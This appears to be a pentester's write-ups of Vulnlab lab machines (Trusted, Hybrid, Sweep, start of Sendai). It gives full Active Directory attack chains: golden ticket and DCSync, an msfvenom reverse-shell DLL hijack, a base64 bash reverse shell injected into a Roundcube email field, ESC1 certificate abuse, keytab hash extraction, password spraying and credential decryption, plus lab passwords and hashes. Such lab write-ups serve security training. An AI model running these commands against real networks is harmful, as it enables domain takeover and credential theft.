kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt

All that is left is to dump ntds from trusted.vl domain

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

We find

Credentials:

Object RDN           : Domain Controllers

** SAM ACCOUNT **

SAM Username         : Domain Controllers
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-516
Object Relative ID   : 516

Credentials:

Object RDN           : DomainDnsZones


Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db<REDACTED>72ef

Object RDN           : BCKUPKEY_0c265ae3-ef84-4900-9983-b1fbe71e738c Secret

And we we evil-winrm to the main dc

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u Administrator -H '15db<REDACTED>72ef' -i trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
trusted\administrator

.

Recommended path

use dnschef with bloodhound-python

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ dnschef --fakeip 10.10.158.230
          _                _          __  
         | | version 0.4  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
                   iphelix@thesprawl.org  

(18:52:27) [*] DNSChef started on interface: 127.0.0.1
(18:52:27) [*] Using the following nameservers: 8.8.8.8
(18:52:27) [*] Cooking all A replies to point to 10.10.158.230
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL.home
(18:52:54) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
(18:52:55) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ bloodhound-python -d 'LAB.TRUSTED.VL' -u 'rsmith' -p 'IHateEric2' -ns 127.0.0.1 -dc labdc.LAB.TRUSTED.VL -c all --zip
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 7 users
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 47 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labdc.lab.trusted.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20240624185341_bloodhound.zip

Bloodhound Analysis show rsmith can set password ewalters

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ rpcclient -U "rsmith" //10.10.192.230

Password for [WORKGROUP\rsmith]:IHateEric2
rpcclient $> setuserinfo2 ewalters 23 'Passw0rd123!'
rpcclient $> 

We can verify if the password is actually updated and we can login through WinRM

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ crackmapexec winrm 10.10.192.230 -u ewalters -p 'Puckiestyle@20242024' 
SMB         10.10.192.230   5985   LABDC            [*] Windows Server 2022 Build 20348 (name:LABDC) (domain:lab.trusted.vl)
HTTP        10.10.192.230   5985   LABDC            [*] http://10.10.192.230:5985/wsman
WINRM       10.10.192.230   5985   LABDC            [+] lab.trusted.vl\ewalters:Passw0rd123! (Pwn3d!

and evil-winrm in labdc

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u ewalters -p Passw0rd123! -i 10.10.192.230 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\ewalters\Documents> hostname
labdc
*Evil-WinRM* PS C:\Users\ewalters\Documents> 

.

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-smbserver -smb2support share .   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.192.230,59756)
[*] AUTHENTICATE_MESSAGE (\,LABDC)
[*] User LABDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> net use \\10.8.2.138\share
The command completed successfully.

*Evil-WinRM* PS C:\AVTest> copy .\KasperskyRemovalTool.exe \\10.8.2.138\share\KasperskyRemovalTool.exe
*Evil-WinRM* PS C:\AVTest> 

after examine KasperskyRemovalTool.exe with procmon on my windows box

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.138 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.138/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll 
*Evil-WinRM* PS C:\AVTest> dir


    Directory: C:\AVTest


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----         6/27/2024   8:19 AM           9216 KasperskyRemovalToolENU.dll
-a----         9/14/2022   7:05 PM            235 readme.txt


*Evil-WinRM* PS C:\AVTest> 

After a couple of seconds we receive a shell as cpowers ( a domain admin)

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 2222 
listening on [any] 2222 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.192.230] 51759
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
lab\cpowers

C:\Windows\system32>

The below scheduled task was running as user cpowers every 1 min.

C:\Users\cpowers\Documents>type task.ps1
type task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"
C:\Users\cpowers\Documents>

That’s all

 

 

 

 

 

 

 

 

vulnlab-hybrid

vulnhub-hybrid

a medium Active-Directory chain

containing : one Ubuntu AD joined pc and a Windows DC

Tools used : keytabextract.py

NMAP enum

# Nmap 7.93 scan initiated Thu Jun 20 10:25:26 2024 as: nmap -Pn -sV -oN ports_hybrid1.txt 10.10.200.5
Nmap scan report for 10.10.200.5
Host is up (0.021s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-20 08:25:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:26:16 2024 -- 1 IP address (1 host up) scanned in 49.67 seconds

.

# Nmap 7.93 scan initiated Thu Jun 20 10:27:06 2024 as: nmap -Pn -sV -oN ports_hybrid2.txt 10.10.200.6
Nmap scan report for 10.10.200.6
Host is up (0.020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
143/tcp  open  imap     Dovecot imapd (Ubuntu)
587/tcp  open  smtp     Postfix smtpd
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:27:19 2024 -- 1 IP address (1 host up) scanned in 13.26 seconds

.

trough NFS enum we find

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

for the mailing part in roundcube i used

bash -i >& /dev/tcp/10.8.2.138/2222 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/hybrid]
bloodhound-python -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.200.5 --zip

Certipy-AD find vuln certs

┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 6FC0F9512195A183421AB786C3012BC6
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2123-06-17 14:14:39+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

we find ESC1 vuln for Domain Computers , I have a Domain joined MAIL01$ machine, enumerating more on MAIL01$, found /etc/krb5.keytab , a file which is used to authenticate to Kerberos without any human interaction or without storing the password.

Transferred the “krb5.keytab” file to my Kali machine and used  keytabextract.py to extract information about MAIL01$ and hashes.

python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458

 

Certipy

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.200.5" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'DC01.hybrid.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

.

┌──(puck㉿kali)-[~/vulnlab/hybrid]
evil-winrm -i hybrid.vl -u 'Administrator' -H '60<REDACTED>dc' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hybrid\administrator

 

 

vulnlab-sweep

vulnlab sweep

a medium windows machine

tools used : crackmapexec , bloodhound-python , sshesame , evil-winrm

nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Brute Force SMB

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

make a users file and crack it with username=password

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Login to browser as user intern on http://sweep.vl:81/ , go to scanning -> scanning credentials ( see that saved creds are used ), go to scanning -> scanning targets -> add range target vulnab vpn ip , and use saved creds

 

and on Kali machine  run SSH Honeypot, I used sshesame, tthe only thing important to change is the sshesame.yaml file

and set listen_address: 10.8.2.138:22 [ in my case]

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected

Logon now to http://sweep.vl:81/Default.aspx as user svc-inventory-lnx

do your thing with more privs

or simpler way after adding svc_inventory_lnx to the “Lansweeper Admins” group.

unintended way : https://github.com/Yeeb1/SharpLansweeperDecrypt

But 1st as Bloodhound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

then Win-RM to the box

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED' 

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

then Winrm to the box as admin

──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>



 

 

 

 

 

 

 

 

.

 

 

vulnlab-sendai

vulnlab sendai

a medium windows machine

enum

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares 
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Enumerated shares
